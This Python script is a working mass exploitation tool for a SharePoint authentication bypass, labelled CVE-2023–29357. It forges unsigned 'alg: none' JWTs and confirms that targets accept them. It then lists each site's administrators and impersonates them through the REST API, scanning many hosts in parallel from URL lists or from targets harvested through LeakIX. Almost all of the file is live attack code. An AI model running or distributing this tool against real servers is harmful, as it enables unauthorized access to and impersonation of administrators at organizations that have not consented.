"""Mass tester for the SharePoint CVE-2023–29357 authentication bypass.

The script builds an unsigned (``alg: none``) JWT, sends it to a SharePoint
site's REST API and reports whether the site accepts it. Targets come from a
single URL, a file of URLs, or a LeakIX query.
"""

import argparse
import base64
import json
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Union, List, Dict
from urllib.parse import urlparse

import requests
from alive_progress import alive_bar
from leakpy.scraper import LeakixScraper
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from rich.console import Console

console = Console()
# Every request below is made with verify=False; silence the resulting warnings.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class SharePoint:
    """One SharePoint target: realm discovery, token forging and API probes."""

    # Used as the token issuer and as the prefix of the audience field.
    client_id = "00000003-0000-0ff1-ce00-000000000000"

    def __init__(self, url: str, verbose: bool):
        """Store the target and immediately resolve its realm and audience.

        Args:
            url: Base URL of the site; a trailing slash is stripped.
            verbose: When true, progress details are printed to the console.

        Raises:
            Exception: If the realm cannot be retrieved (see ``get_realm``).
        """
        self.url = url.rstrip('/')
        self.hostname = urlparse(url).hostname
        self.verbose = verbose
        if self.verbose:
            console.print("[+] URL:", self.url, style="bold green")
            console.print("[+] Hostname:", self.hostname, style="bold green")
        self.realm = self.get_realm()
        self.aud = self.construct_aud_field()

    @staticmethod
    def _extract_realm(www_authenticate: str) -> Union[str, None]:
        """Return the first ``realm="..."`` value in the header, or None."""
        for part in www_authenticate.split(','):
            if 'realm="' in part:
                return part.split('realm="')[1].split('"')[0]
        return None

    @staticmethod
    def _encode_unsigned_jwt(payload: Dict) -> str:
        """Serialize ``payload`` as an ``alg: none`` JWT with an ``AAA`` signature part."""
        header = {"alg": "none"}
        encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
        encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
        return f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA"

    def get_realm(self) -> str:
        """Read the realm from the 401 challenge of ``/_api/web/siteusers``.

        The request carries an empty bearer token; the realm is parsed from
        the ``WWW-Authenticate`` response header.

        Returns:
            The realm string.

        Raises:
            Exception: If the response status is not 401, or if the header is
                missing or carries no non-empty ``realm="..."`` value.
        """
        headers = {"Authorization": "Bearer "}
        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=3)

        realm = None
        if response.status_code == 401:
            realm = self._extract_realm(response.headers.get('WWW-Authenticate', ''))

        # Fail here rather than continue with an unusable realm, which would
        # otherwise produce an audience such as "<client_id>@None".
        if not realm:
            if self.verbose:
                console.print("[-] Unable to retrieve realm", style="bold red")
            raise Exception("Unable to retrieve realm")

        if self.verbose:
            console.print("[+] Realm:", realm, style="bold green")
        return realm

    def construct_aud_field(self) -> str:
        """Return the audience value ``<client_id>@<realm>``."""
        aud = f"{self.client_id}@{self.realm}"
        if self.verbose:
            console.print("[+] Aud Field:", aud, style="bold green")
        return aud

    def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None:
        """Request ``/_api/web/currentuser`` once per admin with a forged token.

        Args:
            admin_users: Dicts as produced by ``authenticate_with_token``; the
                keys ``NameId``, ``NameIdIssuer``, ``Title`` and ``Email`` are read.
        """
        current_time = int(time.time())
        expiration_time = current_time + 3600
        endpoint_url = self.url.strip() + '/_api/web/currentuser'

        for user in admin_users:
            payload = {
                "aud": self.aud,
                "iss": self.client_id,
                "nbf": current_time,
                "exp": expiration_time,
                "ver": "hashedprooftoken",
                "nameid": user.get("NameId", ""),
                "nii": user.get("NameIdIssuer", ""),
                "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
                "endpointurlLength": 1,
                "isloopback": True,
                "isuser": True
            }
            jwt_token = self._encode_unsigned_jwt(payload)
            headers = {
                "Accept": "application/json",
                "Authorization": f"Bearer {jwt_token}",
                "X-PROOF_TOKEN": jwt_token,
            }
            response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5)

            if response.status_code != 200:
                console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red")
                continue

            try:
                parsed_response = json.loads(response.text)
            except json.JSONDecodeError:
                console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow")
            else:
                console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                console.print(json.dumps(parsed_response, indent=4), style="bold green")

    def create_jwt_token(self) -> str:
        """Build the unsigned token used for the initial authentication probe.

        Returns:
            The token string, valid from now for 3600 seconds.
        """
        current_time = int(time.time())
        expiration_time = current_time + 3600
        payload = {
            "aud": self.aud,
            "iss": self.client_id,
            "nbf": current_time,
            "exp": expiration_time,
            "ver": "hashedprooftoken",
            "nameid": f'{self.client_id}@{self.realm}',
            "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
            "endpointurlLength": 1,
            "isloopback": True
        }
        jwt_token = self._encode_unsigned_jwt(payload)
        if self.verbose:
            console.print("[+] JWT Token:", jwt_token, style="bold green")
        return jwt_token

    def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]:
        """Call ``/_api/web/siteusers`` with ``token`` and collect site admins.

        Args:
            token: Token sent as both the bearer token and ``X-PROOF_TOKEN``.

        Returns:
            ``False`` if the status is not 200. On 200: a non-empty list of
            admin dicts (``Title``, ``Email``, ``NameId``, ``NameIdIssuer``)
            when any user has ``IsSiteAdmin`` set to true, otherwise ``True``
            (also when the body is not valid JSON).
        """
        headers = {
            "Accept": "application/json",
            "Authorization": f"Bearer {token}",
            "X-PROOF_TOKEN": token,
        }
        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5)
        if self.verbose:
            console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow")

        if response.status_code != 200:
            if self.verbose:
                console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red")
            return False

        try:
            parsed_response = json.loads(response.text)
        except json.JSONDecodeError:
            if self.verbose:
                console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow")
            return True

        admin_info_list = []
        for user in parsed_response.get('value', []):
            if user.get('IsSiteAdmin', False) is not True:
                continue
            # dict.get only applies its default when the key is absent; a
            # "UserId" that is present but null would yield None and break
            # the nested lookup, so fall back to an empty dict explicitly.
            user_id = user.get('UserId') or {}
            admin_info_list.append({
                "Title": user.get('Title', 'N/A'),
                "Email": user.get('Email', 'N/A'),
                "NameId": user_id.get('NameId', 'N/A'),
                "NameIdIssuer": user_id.get('NameIdIssuer', 'N/A')
            })

        console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green")
        if self.verbose and admin_info_list:
            for admin_info in admin_info_list:
                console.print(json.dumps(admin_info, indent=2), style="bold green")
            console.print("=+"*20, style="bold green")
        return admin_info_list if admin_info_list else True


def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False):
    """Probe one URL and record it when the forged token is accepted.

    Args:
        url: Base URL of the SharePoint site.
        output_file: If set, the URL is appended to this file on success.
        verbose: Print progress and errors.
        mass_exploit: When false and admins were found, also run
            ``SharePoint.spoof_admin_users`` against them.

    Any exception is caught; it is printed only when ``verbose`` is set, so
    one failing target never stops a scan.
    """
    try:
        sp = SharePoint(url, verbose=verbose)
        jwt_token = sp.create_jwt_token()
        authenticated = sp.authenticate_with_token(jwt_token)
        if authenticated:
            if output_file:
                with open(output_file, 'a') as file:
                    file.write(f"{url}\n")
            if not mass_exploit and isinstance(authenticated, list):
                sp.spoof_admin_users(authenticated)
    except Exception as e:
        if verbose:
            console.print("[!] Error in check_url:", str(e), style="bold red")


def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2):
    """Query LeakIX for SharePoint hosts and return de-duplicated URLs.

    Args:
        fields: Field list passed to the scraper.
        bulk: Passed to the scraper as ``use_bulk``.
        pages: Number of result pages to request.

    Returns:
        A list of ``protocol://host:port`` strings in first-seen order.

    Raises:
        SystemExit: With code 1 when no API key is configured.
    """
    LEAKIX_API_KEY = ""  # Configure this line with your LeakIX Pro API Key to use LeakPy
    if LEAKIX_API_KEY == "":
        console.print("[bold red]Please configure the Leakix API key.[/bold red]")
        # The bare exit() builtin is injected by the site module and may be
        # missing (for example under "python -S"); SystemExit always exists.
        raise SystemExit(1)

    scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True)
    results = scraper.execute(
        scope="leak",
        query='+plugin:SharePointPlugin',
        fields=fields,
        pages=pages,
        use_bulk=bulk,
    )

    # dict.fromkeys removes duplicates while keeping first-seen order.
    return list(dict.fromkeys(
        f"{result.get('protocol')}://{result.get('host')}:{result.get('port')}"
        for result in results
    ))


def main():
    """Parse the command line and scan the selected target(s)."""
    parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.')
    parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False)
    parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False)
    parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10)
    parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt')
    parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False)
    parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks")
    parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)")
    parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX")
    args = parser.parse_args()

    urls = []
    if args.leakpy:
        urls = fetch_from_leakix(bulk=args.bulk, pages=args.pages)
    elif args.list:
        with open(args.list, 'r') as file:
            # Skip blank lines so they are not scanned as empty URLs.
            urls = [line.strip() for line in file if line.strip()]
    elif args.url:
        urls = [args.url]

    if not urls:
        console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]")
        return

    if len(urls) > 1 and (args.leakpy or args.list):
        with ThreadPoolExecutor(max_workers=args.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
            futures = {executor.submit(check_url, url, args.output, args.verbose, mass_exploit=True): url for url in urls}
            for future in as_completed(futures):
                bar()
    else:
        check_url(urls[0], args.output, args.verbose, mass_exploit=False)


if __name__ == "__main__":
    main()